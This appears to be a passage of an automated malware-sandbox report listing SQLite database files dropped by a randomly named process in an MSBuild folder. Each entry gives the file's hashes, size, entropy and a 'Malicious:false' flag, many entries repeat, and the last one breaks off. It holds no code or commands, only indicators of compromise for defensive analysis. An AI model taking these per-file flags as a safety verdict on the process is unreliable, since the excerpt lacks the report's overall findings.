                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
